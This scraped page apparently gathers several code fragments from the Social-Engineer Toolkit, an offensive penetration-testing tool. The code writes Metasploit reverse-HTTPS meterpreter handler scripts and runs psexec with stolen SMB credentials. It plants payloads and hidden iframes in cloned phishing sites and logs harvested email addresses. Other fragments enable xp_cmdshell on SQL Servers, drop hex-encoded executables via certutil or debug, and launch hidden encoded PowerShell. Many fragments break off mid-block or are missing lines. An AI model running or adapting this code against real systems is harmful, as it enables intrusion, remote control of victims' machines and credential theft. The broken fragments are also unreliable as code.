Exemplo n.º 1
        choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
        if choice == 'NO':

        # if we want to start the listener
        if choice == 'YES':
            with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
                filewrite.write("use multi/handler\n"
                                "set payload windows/meterpreter/reverse_https\n"
                                "set LPORT {0}\n"
                                "set LHOST\n"
                                "set ExitOnSession false\n"
                                "exploit -j".format(port))

            msf_path = core.meta_path()
            subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
                                                 os.path.join(core.setdir, "reports/powershell/powershell.rc")),

        core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell")))

    # if we select powershell reverse shell
    if powershell_menu_choice == "2":

        # prompt for IP address and port
        port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
        # default to 443
        if not port:
            port = "443"
Exemplo n.º 2
#!/usr/bin/env python
    import readline
from src.core.setcore import bcolors, get_version, check_os, meta_path

# grab version of SET
define_version = get_version()

# check operating system
operating_system = check_os()

# grab metasploit path
msf_path = meta_path()

PORT_NOT_ZERO = "Port cannot be zero!"
PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..."

main_text = " Select from the menu:\n"

main_menu = ['Social-Engineering Attacks',
             'Fast-Track Penetration Testing',
             'Third Party Modules',
             'Update the Metasploit Framework',
             'Update the Social-Engineer Toolkit',
             'Update SET configuration',
             'Help, Credits, and About']

main = ['Spear-Phishing Attack Vectors',
        'Website Attack Vectors',
Exemplo n.º 3
    payload = "windows/meterpreter/reverse_https\n"  # if we are using x86
    command = x86  # assign powershell to command

    # write out our answer file for the powershell injection attack
    with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
        filewrite.write("use multi/handler\n"
                        "set payload windows/meterpreter/reverse_https\n"
                        "set LPORT {0}\n"
                        "set LHOST {1}\n"
                        "set EnableStageEncoding true\n"
                        "set ExitOnSession false\n"
                        "exploit -j\n"
                        "use auxiliary/admin/smb/psexec_command\n"
                        "set RHOSTS {2}\n"
                        "set SMBUser {3}\n"
                        "set SMBPass {4}\n"
                        "set SMBDomain {5}\n"
                        "set THREADS {6}\n"
                        "set COMMAND {7}\n"
                        "exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding))

    # launch metasploit below
    core.print_status("Launching Metasploit.. This may take a few seconds.")
    subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
                                         os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),

# handle exceptions
except Exception as e:
    core.print_error("Something went wrong printing error: {0}".format(e))
if choice == "YES":

    # Open the IPADDR file
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("LHOST IP address to connect back on: ")
        core.update_options("IPADDR=" + ipaddr)

    if core.check_options("PORT=") != 0:
        port = core.check_options("PORT=")

        port = input("Enter the port to connect back on: ")

    with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite:
        filewrite.write("use multi/handler\n"
                        "set payload {0}\n"
                        "set LHOST {1}\n"
                        "set LPORT {2}\n"
                        "set AutoRunScript post/windows/manage/smart_migrate\n"
                        "exploit -j".format(payload, ipaddr, port))

    print("[*] Launching Metasploit....")
        child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                          os.path.join(core.setdir + "metasploit.answers")))
Exemplo n.º 5
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # remove stale index.html files
        if os.path.isfile("index.html"):
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace("<head>",
                                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
                            counter = 1
                    if counter == 0:

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
            shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status("The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
                    print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
                shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:


    if not apache:
        if multiattack_harv == 'off':
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                    thread.start_new_thread(webserver.start_server, (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:

            # Handle Exceptions
            except Exception as e:
                print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                      "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))

                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                            core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
                            input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
                                                       os.path.join(definepath, "src/html/*.html"),
                                                       os.path.join(core.setdir, "web_clone/*"),
                                                       os.path.join(core.setdir, "msf.exe"),
                                                       os.path.join(core.setdir, "*.jar"),

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
            subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace("<body>",
                                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
            core.print_status("All files have been copied to {}".format(apache_path))


    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()
Exemplo n.º 6
def deploy_hex2binary(ipaddr,port,username,password,option):
        # connect to SQL server
        target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
        setcore.print_status("Connection established with SQL Server...")
        setcore.print_status("Converting payload to hexadecimal...")
        # if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
        if os.path.isfile("src/program_junk/set.payload"):
                web_path = ("src/program_junk/web_clone/")
        # then we are using metasploit
        if not os.path.isfile("src/program_junk/set.payload"):
                if operating_system == "posix":
                        web_path = ("src/program_junk")
                        subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
                        subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
        fileopen = file("%s/msf.exe" % (web_path), "rb")
        # read in the binary
        data = fileopen.read()
        # convert the binary to hex
        data = binascii.hexlify(data)
        # we write out binary out to a file
        filewrite = file("src/program_junk/payload.hex", "w")

        # if we are using metasploit, start the listener
        if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
                if operating_system == "posix":
                        import pexpect
                        meta_path = setcore.meta_path()
                        setcore.print_status("Starting the Metasploit listener...")
                        child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))

        # random executable name
        random_exe = setcore.generate_random_string(10,15)

        # next we deploy our hex to binary if we selected option 1 (powershell)

        if option == "1":
                # powershell command here, needs to be unicoded then base64 in order to use encodedcommand
                powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe))
                # there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
                # in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly

                # blank command will store our fixed unicode variable
                blank_command = ""
                # loop through each character and insert null byte
                for char in powershell_command:
                        # insert the nullbyte
                        blank_command += char + "\x00"

                # assign powershell command as the new one
                powershell_command = blank_command
                # base64 encode the powershell command
                powershell_command = base64.b64encode(powershell_command)
                # this will trigger when we are ready to convert

        # next we deploy our hex to binary if we selected option 2 (debug)
        if option == "2":
                setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
                # reconfigure the stored procedure and re-enable
			target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
                        target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
                except: pass
                # we selected hex to binary
                fileopen = file("src/payloads/hex2binary.payload", "r")
                # specify random filename for deployment
                setcore.print_status("Deploying initial debug stager to the system.")
                random_file = setcore.generate_random_string(10,15)
                for line in fileopen:
                        # remove bogus chars
                        line = line.rstrip()
                        # make it printer friendly to screen
                        print_line = line.replace("echo e", "")
                        setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
                        target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
                setcore.print_status("Converting the stager to a binary...")
                # here we convert it to a binary
                target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
                setcore.print_status("Conversion complete. Cleaning up...")
                # delete the random file
                target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))

        # here we start the conversion and execute the payload

        setcore.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        fileopen = file("src/program_junk/payload.hex", "r")
        #random_exe = setcore.generate_random_string(10,15)
        while fileopen:
                data = fileopen.read(900).rstrip()
                # if data is done then break out of loop because file is over
                if data == "": break
                setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
                target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
        setcore.print_status("Delivery complete. Converting hex back to binary format.")

        # if we are using debug conversion then convert our binary
        if option == "2":
                target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
                target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
                # clean up the old files
                setcore.print_status("Cleaning up old files..")
                target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))

        # if we are using SET payload
        if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):           
                setcore.print_status("Spawning seperate child process for listener...")
                try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
                except: pass
                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
                # grab the port options
                if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
                        fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
                        port = fileopen.read().rstrip()
                # if for some reason the port didnt get created we default to 443
                if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443
                # launch the python listener through pexpect
                # need to change the directory real quick
                # now back 
	setcore.print_status("Pausing 10 seconds to let the system catch up...")
        setcore.print_status("Triggering payload stager...")
        # thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified 
        import thread
        # execute the payload
        # we append more commands if option 1 is used
        if option == "1":
                random_exe_execute = random_exe
                random_exe = "powershell -EncodedCommand " + powershell_command

        sql_command = ("xp_cmdshell '%s'" % (random_exe))
        # start thread of SQL command that executes payload
        thread.start_new_thread(target_server.execute_query, (sql_command,))
        # trigger the exe if option 1 is used
        if option == "1":
                sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
                thread.start_new_thread(target_server.execute_query, (sql_command,))
        # if pexpect doesnt exit right then it freaks out
        if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
                os.system("python ../../payloads/set_payloads/listener.py")
                # interact with the child process through pexpect
                except: pass
        except: pass
Exemplo n.º 7
def deploy_hex2binary(ipaddr, port, username, password):
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
    core.print_status("Enabling the xp_cmdshell stored procedure...")
        conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
                           "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
    # just throw a simple command via powershell to get the output
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            attempts = 0
            while attempts <= 2:
                payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
                if os.path.isfile(payload_filename):
                    core.print_error("File not found! Try again.")
                    attempts += 1
                core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
                choice1 = "1"

        if choice1 == "1":
            web_path = None

            import src.core.payloadgen.create_payloads 

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
                # then we are using metasploit
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # we write out binary out to a file

        with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                        import pexpect
                        core.print_status("Starting the Metasploit listener...")
                        msf_path = core.meta_path()
                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                                        os.path.join(core.setdir + "meta_config")))

        # random executable name
        random_exe = core.generate_random_string(10, 15)

    # next we deploy our hex to binary if we selected option 1 (powershell)
    if option == "1":
        core.print_status("Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")

        #with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        filewrite = file(core.setdir + "/payload_options.shellcode", "w")
        filewrite.write("windows/meterpreter/reverse_https {0},".format(port))

            import src.payloads.powershell.prep

        # launch powershell

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        #with open(os.path.join(core.setdir + "x86.powershell")) as x86:
        x86 = file(core.setdir + "x86.powershell").read().rstrip()
        #    x86 = x86.read()

        x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
        filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")

        # if our payload is x86 based - need to prep msfconsole rc
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            #with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
            filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
            filewrite.write("use multi/handler\n"
                                "set payload windows/meterpreter/reverse_https\n"
                                "set lport {0}\n"
                                "set LHOST\n"
                                "exploit -j".format(port))

            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":

                import pexpect

            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
                                                     os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            #child2.expect("Starting the payload handler", timeout=30000)
            child2.expect("Processing", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    # next we deploy our hex to binary if we selected option 2 (debug)

    if option == "2":

        # here we start the conversion and execute the payload
        core.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":

            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,

            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
        core.print_status("Delivery complete. Converting hex back to binary format.")
        core.print_status("Dropping end header for binary format conversion...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
        core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
        conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
        core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                          "You know. When you celebrate. Salute to you ninja - you deserve it.")
        conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
        # if we are using SET payload
        if choice1 == "1":
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                core.print_status("Spawning separate child process for listener...")
                    shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)

                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
                # grab the port options

                # if core.check_options("PORT=") != 0:
                #     port = core.heck_options("PORT=")
                # # if for some reason the port didnt get created we default to 443
                # else:
                #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
            # interact with the child process through pexpect
Exemplo n.º 8
def deploy_hex2binary(ipaddr, port, username, password, option):
    # connect to SQL server
    target_server = _mssql.connect(ipaddr + ":" + str(port), username,
    setcore.PrintStatus("Connection established with SQL Server...")
    setcore.PrintStatus("Converting payload to hexadecimal...")
    # if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
    if os.path.isfile("src/program_junk/set.payload"):
        web_path = ("src/program_junk/web_clone/")
    # then we are using metasploit
    if not os.path.isfile("src/program_junk/set.payload"):
        web_path = ("src/program_junk")
            "cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null",
            "cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null",
    fileopen = file("%s/msf.exe" % (web_path), "rb")
    # read in the binary
    data = fileopen.read()
    # convert the binary to hex
    data = binascii.hexlify(data)
    # we write out binary out to a file
    filewrite = file("src/program_junk/payload.hex", "w")

    # if we are using metasploit, start the listener
    if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
        meta_path = setcore.meta_path()
        setcore.PrintStatus("Starting the Metasploit listener...")
        child2 = pexpect.spawn(
            "%s/msfconsole -r src/program_junk/meta_config" % (meta_path))

    # random executable name
    random_exe = setcore.generate_random_string(10, 15)

    # next we deploy our hex to binary if we selected option 1 (powershell)

    if option == "1":
        # powershell command here, needs to be unicoded then base64 in order to use encodedcommand
        powershell_command = unicode(
            "$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)"
            % (random_exe, random_exe))

        # there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
        # in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly

        # blank command will store our fixed unicode variable
        blank_command = ""
        # loop through each character and insert null byte
        for char in powershell_command:
            # insert the nullbyte
            blank_command += char + "\x00"

        # assign powershell command as the new one
        powershell_command = blank_command
        # base64 encode the powershell command
        powershell_command = base64.b64encode(powershell_command)
        # this will trigger when we are ready to convert

    # next we deploy our hex to binary if we selected option 2 (debug)
    if option == "2":
            "Attempting to re-enable the xp_cmdshell stored procedure if disabled.."
        # reconfigure the stored procedure and re-enable
                "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
            # need to do it a second time for some reason on 2005
        # we selected hex to binary
        fileopen = file("src/payloads/hex2binary.payload", "r")
        # specify random filename for deployment
        setcore.PrintStatus("Deploying initial debug stager to the system.")
        random_file = setcore.generate_random_string(10, 15)
        for line in fileopen:
            # remove bogus chars
            line = line.rstrip()
            # make it printer friendly to screen
            print_line = line.replace("echo e", "")
            setcore.PrintStatus("Deploying stager payload (hex): " +
                                setcore.bcolors.BOLD + str(print_line) +
            target_server.execute_query("xp_cmdshell '%s>> %s'" %
                                        (line, random_file))
        setcore.PrintStatus("Converting the stager to a binary...")
        # here we convert it to a binary
        target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
        setcore.PrintStatus("Conversion complete. Cleaning up...")
        # delete the random file
        target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))

    # here we start the conversion and execute the payload

        "Sending the main payload via to be converted back to a binary.")
    # read in the file 900 bytes at a time
